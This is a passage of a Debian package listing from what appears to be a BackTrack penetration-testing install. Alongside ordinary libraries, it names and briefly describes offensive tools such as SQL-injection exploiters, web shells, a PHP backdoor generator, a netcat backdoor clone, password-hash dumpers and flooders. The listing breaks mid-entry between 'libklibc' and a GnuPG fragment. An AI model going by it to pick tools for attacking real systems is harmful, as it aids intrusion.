2.30.0-0ubuntu1 The GNOME library - runtime files ii libgnome2-common 2.30.0-0ubuntu1 The GNOME library - common files ii libgnomecanvas2-0 2.30.1-0ubuntu1 A powerful object-oriented display - runtime files ii libgnomecanvas2-common 2.30.1-0ubuntu1 A powerful object-oriented display - common files ii libgnomekbd-common 2.30.2-0ubuntu0.1 GNOME library to manage keyboard configuration - common files ii libgnomekbd4 2.30.2-0ubuntu0.1 GNOME library to manage keyboard configuration - shared library ii libgnomeui-0 2.24.3-1 The GNOME libraries (User Interface) - runtime files ii libgnomeui-common 2.24.3-1 
The GNOME libraries (User Interface) - common files ii libgnomevfs2-0 1:2.24.2-1ubuntu2 GNOME Virtual File System (runtime libraries) ii libgnomevfs2-common 1:2.24.2-1ubuntu2 GNOME Virtual File System (common files) ii libgnutls26 2.8.5-2 the GNU TLS library - runtime library ii libgomp1 4.4.3-4ubuntu5 GCC OpenMP (GOMP) support library ii libgp11-0 2.92.92.is.2.30.3-0ubuntu1.1 Glib wrapper library for PKCS#11 - runtime ii libgpg-error0 1.6-1ubuntu2 library for common error values and messages in GnuPG components ii libgphoto2-2 2.4.8-0ubuntu2 gphoto2 digital camera library ii libgphoto2-port0 2.4.8-0ubuntu2 gphoto2 digital camera port library ii libgpm2 1.20.4-3.2ubuntu2 General Purpose Mouse - shared library ii libgps19 2.92-4 Global Positioning System - library ii libgraphviz4 2.20.2-8ubuntu3 rich set of graph drawing tools ii libgs8 8.71.dfsg.1-0ubuntu5.3 The Ghostscript PostScript/PDF interpreter Library ii libgsf-1-114 1.14.16-1ubuntu1 Structured File Library - runtime version ii libgsf-1-common 1.14.16-1ubuntu1 Structured File Library - common files ii libgsm1 1.0.13-3 Shared libraries for GSM speech compressor ii libgsm1-dev 1.0.13-3 Development libraries for a GSM speech compressor ii libgssapi-krb5-2 1.8.1+dfsg-2ubuntu0.9 MIT Kerberos runtime libraries - krb5 GSS-API Mechanism ii libgssglue1 0.1-4 mechanism-switch gssapi library ii libgstreamer-plugins-base0.10-0 0.10.28-1 GStreamer libraries from the "base" set ii libgstreamer0.10-0 0.10.28-1 Core GStreamer libraries and elements ii libgtk2.0-0 2.20.1-0ubuntu2 The GTK+ graphical user interface library ii libgtk2.0-bin 2.20.1-0ubuntu2 The programs for the GTK+ graphical user interface library ii libgtk2.0-common 2.20.1-0ubuntu2 Common files for the GTK+ graphical user interface library ii libgtkmm-2.4-1c2a 1:2.20.3-0ubuntu1 C++ wrappers for GTK+ (shared libraries) ii libgtksourceview2.0-0 2.10.4-0ubuntu1 shared libraries for the GTK+ syntax highlighting widget ii libgtksourceview2.0-common 2.10.4-0ubuntu1 
common files for the GTK+ syntax highlighting widget ii libgtop2-7 2.26.1-0ubuntu2 gtop system monitoring library ii libgtop2-common 2.26.1-0ubuntu2 common files for the gtop system monitoring library ii libgucharmap7 1:2.30.0-0ubuntu1 Unicode browser widget library (shared library) ii libgudev-1.0-0 1:151-12.3 GObject-based wrapper library for libudev ii libgutenprint2 5.2.5-0ubuntu1.1 runtime for the Gutenprint printer driver library ii libgvfscommon0 1.6.1-0ubuntu1build1 userspace virtual filesystem - library ii libgweather-common 2.30.0-0ubuntu1 GWeather common files ii libgweather1 2.30.0-0ubuntu1 GWeather shared library ii libhal-storage1 0.5.14-0ubuntu6 Hardware Abstraction Layer - shared library for storage devices ii libhal1 0.5.14-0ubuntu6 Hardware Abstraction Layer - shared library ii libhpmud0 3.10.2-2ubuntu2.2 HP Multi-Point Transport Driver (hpmud) run-time libraries ii libhtml-format-perl 2.04-2 format HTML syntax trees into text, PostScript or RTF ii libhtml-parser-perl 3.64-1 collection of modules that parse HTML text documents ii libhtml-tagset-perl 3.20-2 Data tables pertaining to HTML ii libhtml-template-perl 2.9-1 HTML::Template : A module for using HTML Templates with Perl ii libhtml-tree-perl 3.23-1 represent and create HTML syntax trees ii libhttp-server-simple-perl 0.41-1 simple stand-alone HTTP server ii libhunspell-1.2-0 1.2.8-6ubuntu1 spell checker and morphological analyzer (shared library) ii libiaxclient-dev 2.0.2-3build1 Portable IAX(2) protocol telephony client - development files ii libiaxclient1 2.0.2-3build1 Portable IAX(2) protocol telephony client - shared library ii libical0 0.44-3 iCalendar library implementation in C (runtime) ii libice-dev 2:1.0.6-1 X11 Inter-Client Exchange library (development headers) ii libice6 2:1.0.6-1 X11 Inter-Client Exchange library ii libicu42 4.2.1-3 International Components for Unicode ii libid3tag0 0.15.1b-10build2 ID3 tag reading library from the MAD project ii libidl0 0.8.13-1 library for 
parsing CORBA IDL files ii libidn11 1.15-2 GNU Libidn library, implementation of IETF IDN specifications ii libido-0.1-0 0.1.6-0ubuntu1 Shared library providing extra gtk menu items for display in ii libiec61883-0 1.2.0-0.1build1 an partial implementation of IEC 61883 ii libijs-0.35 0.35-7build1 IJS raster image transport protocol: shared library ii libilmbase6 1.0.1-3build2 several utility libraries from ILM used by OpenEXR ii libimage-exiftool-perl 7.89-1 Library and program to read and write meta information in multimedia files ii libimlib2 1.4.2-5build1 powerful image loading and rendering library ii libimobiledevice0 0.9.7-1ubuntu1 Library for communicating with the iPhone and iPod Touch ii libindicate4 0.3.6-0ubuntu1 GNOME panel indicator applet - shared library ii libindicator0 0.3.8-0ubuntu1 GNOME panel indicator applet - shared library ii libio-socket-ssl-perl 1.31-1 Perl module implementing object oriented interface to SSL sockets ii libio-string-perl 1.08-2 Emulate IO::File interface for in-core strings ii libisc60 1:9.7.0.dfsg.P1-1ubuntu0.1 ISC Shared Library used by BIND ii libisccc60 1:9.7.0.dfsg.P1-1ubuntu0.1 Command Channel Library used by BIND ii libisccfg60 1:9.7.0.dfsg.P1-1ubuntu0.1 Config File Handling Library used by BIND ii libiw30 30~pre9-3ubuntu4 Wireless tools - library ii libjack0 0.118+svn3796-1ubuntu2 JACK Audio Connection Kit (libraries) ii libjasper1 1.900.1-7 The JasPer JPEG-2000 runtime library ii libjpeg62 6b-15ubuntu1 The Independent JPEG Group's JPEG runtime library ii libjpeg62-dev 6b-15ubuntu1 Development files for the IJG JPEG library ii libjs-jquery 1.3.3-2ubuntu1 JavaScript library for dynamic web applications ii libjson-glib-1.0-0 0.7.6-0ubuntu2 GLib JSON manipulation library ii libjudydebian1 1.0.5-1 C library for creating and accessing dynamic arrays ii libk5crypto3 1.8.1+dfsg-2ubuntu0.9 MIT Kerberos runtime libraries - Crypto Library ii libkeyutils1 1.2-12 Linux Key Management Utilities (library) ii libklibc 
interface to GnuPG (GPG) ii python-gnuplot 1.8-1.1 A Python interface to the gnuplot plotting program ii python-gobject 2.21.1-0ubuntu3 Python bindings for the GObject library ii python-gtk2 2.17.0-0ubuntu2 Python bindings for the GTK+ widget set ii python-gtksourceview2 2.10.1-0ubuntu1 Python bindings for the GtkSourceView widget ii python-httplib2 0.6.0-1 comprehensive HTTP client library written in Python ii python-imaging 1.1.7-1ubuntu0.1 Python Imaging Library ii python-imaging-tk 1.1.7-1ubuntu0.1 Python Imaging Library - ImageTk Module ii python-impacket 0.9.6.0-3 Python module to easily build and dissect network protocols ii python-iniparse 0.3.1-1 Module to access and modify configuration data in INI files ii python-launchpadlib 1.6.0-0ubuntu1 Launchpad web services client library ii python-lazr.restfulclient 0.9.11-1ubuntu1.1 client for lazr.restful-based web services ii python-lazr.uri 1.0.2-1 library for parsing, manipulating, and generating URIs ii python-libxml2 2.7.6.dfsg-1ubuntu1.1 Python bindings for the GNOME XML library ii python-lightblue 0.3.2-1ubuntu1 cross-platform Bluetooth API for Python ii python-lxml 2.2.4-1 pythonic binding for the libxml2 and libxslt libraries ii python-minimal 2.6.5-0ubuntu1 A minimal subset of the Python language (default version) ii python-netaddr 0.7.4-1 manipulation of various common network address notations ii python-newt 0.52.10-5ubuntu1 A NEWT module for Python ii python-nltk 2.0~b8-0ubuntu1 Python libraries for natural language processing ii python-notify 0.1.1-2build3 Python bindings for libnotify ii python-numpy 1:1.3.0-3build1 Numerical Python adds a fast array facility to the Python language ii python-oauth 1.0a~svn1124-0ubuntu2 implementation of the OAuth protocol ii python-openssl 0.10-1 Python wrapper around the OpenSSL library ii python-pam 0.4.2-12.1ubuntu1 A Python interface to the PAM library ii python-pcapy 0.10.6-1ubuntu2 Python interface to the libpcap packet capture library ii python-pefile 
1.2.9.1-1 Portable Executable (PE) parsing module for Python ii python-pexpect 2.3-1build1 Python module for automating interactive applications ii python-pkg-resources 0.6.10-4ubuntu1 Package Discovery and Resource Access using pkg_resources ii python-problem-report 1.13.3-0ubuntu2 Python library to handle problem reports ii python-psyco 1.6-1ubuntu2 Python specializing compiler ii python-ptrace 0.6.3-bt0 Python binding of ptrace library ii python-pyasn1 0.0.8a-1 ASN.1 library for Python ii python-pybonjour 1.1.1-bt4 ybonjour provides a pure-Python interface to Apple Bonjour and compatible DNS- SD libraries (such as Avahi). ii python-pycurl 7.19.0-3 Python bindings to libcurl ii python-pydot 1.0.2-1 Python interface to Graphviz's dot ii python-pyicu 0.9-2 Python extension wrapping the ICU C++ API ii python-pymssql 1.0.2+dfsg-1 Python database access for MS SQL server and Sybase ii python-pyorbit 2.24.0-5ubuntu3 A Python language binding for the ORBit2 CORBA implementation ii python-pyparsing 1.5.2-1ubuntu1 Python parsing module ii python-pypcap 1.1.2+debian-2ubuntu1 object-oriented Python interface for libpcap ii python-pyx 0.10-1ubuntu3 Python module for generating PostScript graphics ii python-qt3 3.18.1-4ubuntu1 Qt3 bindings for Python ii python-qt4 4.7.3-1ubuntu2~lucid1~ppa3 Python bindings for Qt4 ii python-scipy 0.7.0-2ubuntu0.1 scientific tools for Python ii python-serial 2.3-1 pyserial - module encapsulating access for the serial port ii python-simplejson 2.0.9-1build1 Simple, fast, extensible JSON encoder/decoder for Python ii python-sip 4.10.2-1ubuntu1~lucid1~ppa1 Python/C++ bindings generator runtime library ii python-smartpm 1.2-5 Python library of the Smart Package Manager ii python-soappy 0.12.0-4 SOAP Support for Python ii python-support 1.0.4ubuntu1 automated rebuilding support for Python modules ii python-svn 1.7.2-2ubuntu1 A(nother) Python interface to Subversion ii python-tk 2.6.5-0ubuntu2 Tkinter - Writing Tk applications with Python ii 
python-twisted-bin 10.0.0-2ubuntu2 Event-based framework for internet applications ii python-twisted-core 10.0.0-2ubuntu2 Event-based framework for internet applications ii python-twisted-web 10.0.0-1 An HTTP protocol implementation together with clients and servers ii python-utidylib 0.2-3.2ubuntu2 Python wrapper for TidyLib ii python-wadllib 1.1.4-1ubuntu1 Python library for navigating WADL files ii python-wicd 1.7.0+ds1-2 wired and wireless network manager - Python module ii python-wxgtk2.8 2.8.10.1-0ubuntu1.2 wxWidgets Cross-platform C++ GUI toolkit (wxPython binding) ii python-wxversion 2.8.10.1-0ubuntu1.2 wxWidgets Cross-platform C++ GUI toolkit (wxPython version selector) ii python-xdg 0.18-1ubuntu2 Python library to access freedesktop.org standards ii python-xkit 0.4.2.2 library for the manipulation of the xorg.conf ii python-yaml 3.09-2build1 YAML parser and emitter for Python ii python-zope.interface 3.5.3-1ubuntu2 Interfaces for Python ii python2 2.7.1-bt2 Python 2.7.1 ii python2.6 2.6.5-1ubuntu6 An interactive high-level object-oriented language (version 2.6) ii python2.6-minimal 2.6.5-1ubuntu6 A minimal subset of the Python language (version 2.6) ii python3 3.1.2-0ubuntu1 An interactive high-level object-oriented language (default python3 version) ii python3-minimal 3.1.2-0ubuntu1 A minimal subset of the Python language (default python3 version) ii python3.1 3.1.2-0ubuntu3 An interactive high-level object-oriented language (version 3.1) ii python3.1-minimal 3.1.2-0ubuntu3 A minimal subset of the Python language (version 3.1) ii pyxplot 0.7.1+1-1 data plotting program producing publication-quality output ii r8187-driver 26.1010.0622.2006-bt0 Patched IEEE r8187 drivers for 2.6.38 ii radeontool 1.6.1-0ubuntu1 utility to control ATI Radeon backlight functions on laptops ii rake 0.8.7-1 a ruby build program ii rar 1:3.9.b2-1 Archiver for .rar files ii rarian-compat 0.8.1-4ubuntu1 Documentation meta-data library (compatibility tools) ii rdate 1:1.2-4build1 
sets the system's date from a remote host ii rdesktop 1.6.0-2ubuntu3 RDP client for Windows NT/2000 Terminal Server ii rdoc1.8 1.8.7.249-2 Generate documentation from Ruby source files (for Ruby 1.8) ii rdoc1.9.2 1.9.2.z1-1ppa1~lucid Generate documentation from Ruby source files (for Ruby 1.9.2) ii readline-common 6.1-1 GNU readline and history libraries, common files ii readpst 0.6.41-bt0 Utility which can convert email messages to both mbox and MH mailbox formats. ii recordmydesktop 0.3.8.1+svn602-1ubuntu1 Captures audio-video data of a Linux desktop session ii recordmydesktop-bt 1.0-bt1 Launcher of RecordMyDesktop for BackTrack Report-Tools. ii recoverjpeg 2.0-bt0 A tool to recover lost files on damaged memory cards or USB drives. ii reglookup 0.12.0-bt0 RegLookup is an small command line utility for reading and querying Windows NT-based registries. ii reiserfsprogs 1:3.6.21-1build1 User-level tools for ReiserFS filesystems ii revhosts 2.0-bt3 Vhost enumeration and hackign tool ii rfidiot 1.0a-bt4 RFIDIOt is an open source python library for exploring RFID devices ii rfuzz 0.9-bt2 RFuzz is a Ruby library to easily test web applications from the outside using a fast HttpClient and wicked evil RandomGenerator allowing the average prog ii ri 4.2-2~uorppa0 Ruby Interactive reference (ri) ii ri1.8 1.8.7.249-2 Ruby Interactive reference (for Ruby 1.8) ii ri1.9.2 1.9.2.z1-1ppa1~lucid Ruby Interactive reference (for Ruby 1.9.2) ii rifiuti 1.0+20040505-4 A MS Windows recycle bin analysis tool ii rinetd 0.62-5.1 Internet TCP redirection server ii rkhunter 1.3.8-bt1 This tool scans for rootkits, backdoors and local exploits. 
ii rpm-common 4.7.2-1lbuild1 common files for RPM ii rrdtool 1.3.8-1ubuntu1 Time-series data storage and display system (programs) ii rsync 3.0.7-1ubuntu1.1 fast remote file copy program (like rcp) ii rsyslog 4.2.0-2ubuntu8.1 enhanced multi-threaded syslogd ii rtkit 0.6-0ubuntu1 Realtime Policy and Watchdog Daemon ii rtpbreak 1.3a-bt2 With rtpbreak you can detect, reconstruct and analyze any RTP session. ii rtpflood 1.0-bt0 Command line tool used to flood any device processing RTP. ii rtpinject 1.0-bt1 RTP (Voip) injection tool ii rtpinsertsound 3.0-bt1 RTP (Voip) securoty tool ii rtpmixsound 3.0-bt1 RTP (Voip) security tool ii ruby 4.2-2~uorppa0 An interpreter of object-oriented scripting language Ruby ii ruby-dev 4.2-2~uorppa0 Header files for compiling extension modules for Ruby ii ruby1.8 1.8.7.249-2 Interpreter of object-oriented scripting language Ruby 1.8 ii ruby1.8-dev 1.8.7.249-2 Header files for compiling extension modules for the Ruby 1.8 ii ruby1.9.2 1.9.2.z1-1ppa1~lucid Interpreter of object-oriented scripting language Ruby 1.9.2 ii ruby1.9.2-dev 1.9.2.z1-1ppa1~lucid Header files for compiling extension modules for the Ruby 1.9.2 ii rubygems 1.3.7-1~uorppa0 package management framework for Ruby libraries/applications ii rubygems1.8 1.3.7-1~uorppa0 package management framework for Ruby libraries/applications ii rubygems1.9.2 1.3.7-1~uorppa0 package management framework for Ruby libraries/applications ii safecopy 1.6-bt0 A data recovery tool which tries to extract as much data as possible from a problematic source. ii samba-common 2:3.4.7~dfsg-1ubuntu3.6 common files used by both the Samba server and client ii samba-common-bin 2:3.4.7~dfsg-1ubuntu3.6 common files used by both the Samba server and client ii samdump 1.0-bt0 Extracts a Samba-style smbpasswd file directly from an offline copy of the SAM. 
ii samdump2 1.1.1-1 Dump Windows 2k/NT/XP password hashes ii sapyto 0.99-bt0 SAP Penetration Testing Framework ii sbd 1.37-bt1 Secure Backdoor Netcat clone ii scalpel 2.0-bt2 A fast file carver that reads a database of header and footer definitions and extracts matching files or data fragments from a set of image files or raw d ii scapy 2.1.0-bt1 Scapy is a powerful packet manipulation tool and supports multiple protocols. ii screen 4.0.3-14ubuntu1.2 terminal multiplexor with VT100/ANSI terminal emulation ii screen-resolution-extra 0.13 Extension for the GNOME screen resolution applet ii scrollkeeper 0.8.1-4ubuntu1 Transitional package for scrollkeeper ii scrounge-ntfs 0.9-bt0 A data recovery program for NTFS filesystems. ii sctpscan 12.0-bt2 SCTPscan can scan networks for SCTP aware machines and open ports. ii securityfocus 1.0-bt1 Firefox link to SecurityFocus.com. ii sed 4.2.1-6 The GNU sed stream editor ii sensible-utils 0.0.1ubuntu3 Utilities for sensible alternative selection ii set 1.3.5-bt4 The Social-Engineer Toolkit (SET) is an open source, python driven tool for penetration testers. ii sfuzz 0.7.0alpha-bt2 simple fuzz is exactly what it sounds like - a simple fuzzer. don't mistake simple with a lack of fuzz capability. this fuzzer has two network modes of op ii sgml-base 1.26 SGML infrastructure and SGML catalog file support ii sgml-data 2.0.4 common SGML and XML data ii shared-mime-info 0.71-1ubuntu2 FreeDesktop.org shared MIME database and spec ii sharutils 1:4.6.3-4 shar, unshar, uuencode, uudecode ii shodan 1.0-bt2 Firefox link to ShodanHQ.com. ii sickfuzz 0.3-bt0 A fuzzer made out of several custom .spk files. ii siege 2.70-bt1 Siege is an http load testing and benchmarking utility. 
ii sipcrack 0.3-bt2 SIPcrack is a suite for sniffing and cracking the digest authentification used in the SIP protocol ii sipp 3.2-bt0 SIPp is a free Open Source test tool, traffic generator for the SIP protocol ii sipsak 0.9.6-bt0 A small command line tool for developers and administrators of Session Initiation Protocol (SIP) applications. ii sipscan 0.1-bt1 A fast network scanner for UDP-SIP clients. ii sipvicious 0.2.6-bt0 SIPVicious suite is a set of tools that can be used to audit SIP based VoIP systems. ii skipfish 2.00-bt0 A fully automated, active web application security reconnaissance tool. ii sleuthkit 3.2.1-bt0 The Sleuth Kit (TSK) is a C library and a collection of command line tools. Autopsy is a graphical interface to TSK. TSK can be integrated into automated ii smap 0.6.0-bt0 A simple scanner for SIP enabled devices. ii smbclient 2:3.4.7~dfsg-1ubuntu3.6 command-line SMB/CIFS clients for Unix ii smistrip 0.4.8+dfsg2-2 extract MIB from text files like RFC ii smtp-user-enum 1.2-bt0 Username guessing tool primarily for use against the default Solaris SMTP service ii smtprc 2.0.3-bt0 A network open mail relay checker. ii smtpscan 0.5-bt0 A tool to guess which MTA is used by sending several "special" SMTP requests. ii sniffjoke 0.4.1-bt1 SniffJoke is an application for Linux that handle transparently your TCP connection, delaying, modifyng and inject fake packets inside your transmission, ii snmp 5.4.2.1~dfsg0ubuntu1-0ubuntu2.1 SNMP (Simple Network Management Protocol) applications ii snmp-mibs-downloader 1.0 Install and manage Management Information Base (MIB) files ii snmpcheck 1.8-bt2 Like to snmpwalk, snmpcheck permits to enumerate information via SNMP protocol. 
ii snmpenum 1.0-bt2 Simple Perl script to enumerate information on Machines that are running SNMP ii snort 2.8.5.2-2build1 flexible Network Intrusion Detection System ii snort-common 2.8.5.2-2build1 flexible Network Intrusion Detection System [common files] ii snort-common-libraries 2.8.5.2-2build1 flexible Network Intrusion Detection System ruleset ii snort-rules-default 2.8.5.2-2build1 flexible Network Intrusion Detection System ruleset ii socat 1.7.1.3-bt2 socat is a relay for bidirectional data transfer between two independent data channels. Each of these data channels may be a file, pipe, device (serial li ii sox 14.3.0-1.1build1 Swiss army knife of sound processing ii spamhole 0.4-bt0 spamhole is a fake sopen SMTP relay, intended to stop (some) spam by convincing spammers that it is delivering spam messages for them, when in fact it is ii spike 2.9-bt5 A powerful network fuzzer. ii sqlbrute 1.0-bt3 Multi-threaded blind SQL injection bruteforcer. ii sqlite 2.8.17-6build2 command line interface for SQLite ii sqlite3 3.6.22-1 A command line interface for SQLite 3 ii sqlmap 0.9-bt2 sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of back-end d ii sqlninja 0.2.6-bt0 Sqlninja is a tool targeted to exploit SQL Injection vulnerabilities on a web application that uses Microsoft SQL Server. ii squashfs-tools 1:4.0-6ubuntu1 Tool to create and append to squashfs filesystems ii ssidsniff 0.53-bt2 A curses based tool that allows identification, classification and data capturing of wireless networks. The interface is inspired by the unix top(1) utili ii ssl-cert 1.0.23ubuntu2 simple debconf wrapper for OpenSSL ii ssldump 0.9b3-bt0 An SSLv3/TLS network protocol analyzer. ii sslh 1.8rc4-bt0 Lets one accept both HTTPS and SSH connections on the same port. ii sslscan 1.8.2-bt2 SSLScan determines what ciphers are supported on SSL-based services, such as HTTPS. 
Furthermore, SSLScan will determine the prefered ciphers of the SSL se ii sslsniff 0.7-bt0 Designed to MITM all SSL connections on a LAN and dynamically generate certs. ii sslstrip 0.8-bt0 Transparently hijacks HTTP traffic on a network. ii stegdetect 0.6-bt0 Stegdetect is an automated tool for detecting steganographic content in images. It is capable of detecting several different steganographic methods to emb ii strace 4.5.19-2 A system call tracer ii stunnel4 4.35-bt2 The stunnel program is designed to work as an SSL encryption wrapper between remote client and local (inetd-startable) or remote servers. The goal is to f ii subversion 1.6.6dfsg-2ubuntu1.2 Advanced version control system ii sudo 1.7.2p1-1ubuntu5.3 Provide limited super user privileges to specific users ii swaks 20100211-bt0 A flexible, scriptable, transaction-oriented SMTP test tool. ii swig 1.3.40-2ubuntu1 Generate scripting interfaces to C/C++ code ii syslinux 2:3.63+dfsg-2ubuntu3 Bootloader for Linux/i386 using MS-DOS floppies ii sysv-rc 2.87dsf-4ubuntu17.2 System-V-like runlevel change mechanism ii sysv-rc-conf 0.99-6 SysV init runlevel configuration tool for the terminal ii sysvinit-utils 2.87dsf-4ubuntu17.2 System-V-like utilities ii tar 1.22-2ubuntu1 GNU version of the tar archiving utility ii tasksel 2.73ubuntu26 Tool for selecting tasks for installation on Debian systems ii tasksel-data 2.73ubuntu26 Official tasks used for installation of Debian systems rc tcl8.4 8.4.19-4 Tcl (the Tool Command Language) v8.4 - run-time files ii tcl8.5 8.5.8-2 Tcl (the Tool Command Language) v8.5 - run-time files ii tcpd 7.6.q-18 Wietse Venema's TCP wrapper utilities ii tcpdump 4.1.1-bt6 A powerful command-line packet analyzer. 
ii tcpflow 0.21.ds1-6 TCP flow recorder ii tcpreplay 3.4.4-bt0 Tcpreplay is a suite written by Aaron Turner for UNIX operating systems which gives you the ability to use previously captured traffic in libpcap format ii tcptraceroute 1.5beta7-bt3 tcptraceroute is a traceroute implementation using TCP packets. ii tcpxtract 1.0.1-5 extracts files from network traffic based on file signatures ii telnet 0.17-36build1 The telnet client ii testdisk 6.11.3-bt0 Powerful free data recovery software. ii testssl.sh 1.13-bt1 testssl.sh is a Unix command line tool which checks for the support of weak and medium (i.e. also weak) SSL ciphers and the old SSL version 2. ii tex-common 2.06ubuntu0.1 common infrastructure for building and installing TeX ii texlive-base 2009-7 TeX Live: Essential programs and files ii texlive-binaries 2009-5ubuntu0.2 Binaries for TeX Live ii texlive-common 2009-7 TeX Live: Base component ii texlive-doc-base 2009-2 TeX Live: TeX Live documentation ii texlive-latex-base 2009-7 TeX Live: Basic LaTeX packages ii texlive-latex-base-doc 2009-7 TeX Live: Documentation files for texlive-latex-base ii texlive-luatex 2009-7 TeX Live: LuaTeX packages ii thc-ipv6 1.4-bt1 A complete tool set to attack the inherent protocol weaknesses of IPV6. ii thc-pptp-bruter 0.1.4-bt0 Brute force program against pptp vpn endpoints (tcp port 1723). ii thcsslcheck 0.1-bt2 Windows tool that checks the remote ssl stack for supported ciphers and version. ii theharvester 2.0-bt1 theHarvester is a tool for gathering e-mail accounts and subdomain names from different public sources. ii time 1.7-23build1 The GNU time program for measuring cpu resource usage ii tinyproxy 1.8.2-bt1 Tinyproxy is a light-weight HTTP proxy daemon for POSIX operating systems. 
Designed from the ground up to be fast and yet small, it is an ideal solution f rc tk8.4 8.4.19-4 Tk toolkit for Tcl and X11, v8.4 - run-time files ii tk8.5 8.5.8-1 Tk toolkit for Tcl and X11, v8.5 - run-time files ii tofrodos 1.7.8.debian.1-2 Converts DOS <-> Unix text files, alias tofromdos ii traceroute 2.0.13-bt2 This is a new modern implementation of traceroute(8) utility for Linux systems. ii truecrypt 7.0-bt4 open-source disk encryption software ii tsconf 1.0-7build1 touch screen library common files ii ttf-dejavu 2.30-2 Metapackage to pull in ttf-dejavu-core and ttf-dejavu-extra ii ttf-dejavu-core 2.30-2 Vera font family derivate with additional characters ii ttf-dejavu-extra 2.30-2 Vera font family derivate with additional characters ii ttf-droid 1.00~b112+dfsg+1-0ubuntu1 handheld device font with extensive style and language support ii ttf-dustin 20030517-7 Various TrueType fonts from dustismo.com ii ttf-freefont 20090104-5 Freefont Serif, Sans and Mono Truetype fonts ii ttf-liberation 1.05.2.20091019-4 Fonts with the same metrics as Times, Arial and Courier ii ttf-mscorefonts-installer 3.2ubuntu0.1 Installer for Microsoft TrueType core fonts ii ttf-symbol-replacement 1.2.2-0ubuntu2~lucid1 Free font with the same metrics as Symbol ii ttf-umefont 411-1 Japanese TrueType font, Ume-font ii ttf-unfonts-core 1.0.1-7ubuntu1 Un series Korean TrueType fonts ii tzdata 2011g-0ubuntu0.10.04 time zone and daylight-saving time data ii tzdata-java 2011g-0ubuntu0.10.04 time zone and daylight-saving time data for use by java runtimes ii ua-tester 1.06-bt2 his tool is designed to automatically check a given URL using a list of standard and non-standard User Agent strings provided by the user (1 per line). 
ii ubuntu-keyring 2010.11.09 GnuPG keys of the Ubuntu archive ii ubuntu-serverguide 10.04.3 The Ubuntu Server Guide ii ubuntu-system-service 0.1.20.1 Dbus service to set various system-wide configurations ii ucf 3.0025 Update Configuration File: preserve user changes to config files. ii udev 151-12.3 rule-based device node and kernel event manager ii udisks 1.0.1-1ubuntu1 abstraction for enumerating block devices ii udp.pl 1.0-bt2 UDP flooder. ii udptunnel r16-bt2 Tunnels TCP over UDP packets. ii ufw 0.30pre1-0ubuntu2 program for managing a Netfilter firewall ii unetbootin-bt 1.0-bt0 UNetbootin allows you to create bootable Live USB drives for Ubuntu, Fedora, and other Linux distributions without burning a CD. ii untidy beta2-bt1 untidy is general purpose XML Fuzzer. ii unzip 6.0-1build1 De-archiver for .zip files ii update-inetd 4.35ubuntu0.1 inetd configuration file updater ii update-manager-core 1:0.134.11 manage release upgrades ii update-notifier-common 0.99.3 Files shared between update-notifier and adept ii upower 0.9.1-1 abstraction for power management ii upstart 0.6.5-8 event-based init daemon ii ureadahead 0.100.0-4.1.3 Read required files in advance ii usbmuxd 1.0.2-1ubuntu2 USB multiplexor daemon for iPhone and iPod Touch devices ii usbutils 0.86-2ubuntu1 Linux USB utilities ii user-setup 1.28ubuntu7 Set up initial user and password ii util-linux 2.17.2-0ubuntu1.10.04.2 Miscellaneous system utilities ii uuid-runtime 2.17.2-0ubuntu1.10.04.2 runtime components for the Universally Unique ID library ii v86d 0.1.9-1ubuntu1 daemon to run x86 code in an emulated environment ii vbetool 1.1-2 run real-mode video BIOS code to alter hardware state ii videojak 2.00-bt3 VideoJak is an IP Video security assessment tool that can simulate a proof of concept video interception or replay test. 
ii vim 2:7.2.330-1ubuntu3 Vi IMproved - enhanced vi editor ii vim-common 2:7.2.330-1ubuntu3 Vi IMproved - Common files ii vim-runtime 2:7.2.330-1ubuntu3 Vi IMproved - Runtime files ii vim-tiny 2:7.2.330-1ubuntu3 Vi IMproved - enhanced vi editor - compact version ii vinetto 0.7-bt2 Vinetto is a forensics tool to examine Thumbs.db files. ii vlan 1.9-3ubuntu3 user mode programs to enable VLANs on your ethernet devices ii voiper 0.07-bt3 VoIPER is a security toolkit that aims to allow developers and security researchers to easily, extensively and automatically test VoIP devices for securit ii voiphopper 1.0-bt0 VoIP Hopper is a GPLv3 licensed security tool, written in C, that rapidly runs a VLAN Hop into the Voice VLAN on specific Ethernet switches. VoIP Hopper d ii voipong 2.0-bt1 utility which detects all Voice Over IP calls on a pipeline ii volatility 1.3-bt1 A completely open collection of tools, implemented in Python under the GNU General Public License, for the extraction of digital artifacts from volatile m ii w3af 1.0-rc5-bt2 w3af is a Web Application Attack and Audit Framework. The project's goal is to create a framework to find and exploit web application vulnerabilities that ii w3m 0.5.2-2.1ubuntu1.2 WWW browsable pager with excellent tables/frames support ii waffit 0.9.0-bt1 WAFW00F allows one to identify and fingerprint WAF products protecting a website. ii wapiti 2.2.1-bt2 Web application vulnerability scanner, & security auditor. ii warvox 1.0.1-bt1 WarVOX is a suite of tools for exploring, classifying, and auditing telephone systems. ii wbar 1.3.3+dfsg2-1 light and fast launch bar ii wbarconf 0.7.2-bt2 wbar configuration gui written with Python and GTK. ii websecurify 0.8-bt0 Websecurify is a powerful web application security testing environment designed from the ground up to provide the best combination of automatic and manual ii webshag 1.10-bt3 Webshag is a multi-threaded, multi-platform web server audit tool. 
Written in Python, it gathers commonly useful functionalities for web server auditing l ii webshells 1.0-bt1 collection of web shell ii webslayer rev5-bt0 A tool designed for bruteforcing Web Applications. ii weevely 0.3-bt0 Weevely generate PHP code to trojanize a web server, and act like a client to estabilish a telnet-like connection or inject addictional function on backdo ii wepcrack 0.1-bt2 WEPCrack is an open source tool for breaking 802.11 WEP secret keys. ii wfuzz 1.4c-bt1 Wfuzz is a tool designed for bruteforcing Web Applications, it can be used for finding resources not linked (directories, servlets, scripts, etc), brutefo ii wget 1.12-1.1ubuntu2.1 retrieves files from the web ii whatweb 0.4.7-bt3 WhatWeb identifies websites. ii whiptail 0.52.10-5ubuntu1 Displays user-friendly dialog boxes from shell scripts ii wicd 1.7.0+ds1-2 wired and wireless network manager - metapackage ii wicd-daemon 1.7.0+ds1-2 wired and wireless network manager - daemon ii wicd-gtk 1.7.0+ds1-2 wired and wireless network manager - GTK+ client ii wifitap 0.4.0-bt2 WiFi injection tool through tun/tap device ii winbind 2:3.4.7~dfsg-1ubuntu3.6 Samba nameservice integration server ii windows-binaries 1.0-bt0 Various windows pentesting binaries. ii wine 1.2.2-0ubuntu2~lucid1 Microsoft Windows Compatibility Layer (dummy package) ii wine1.2 1.2.2-0ubuntu2~lucid1 Microsoft Windows Compatibility Layer (Binary Emulator and Library) ii wine1.2-gecko 1.0.0-0ubuntu4 Microsoft 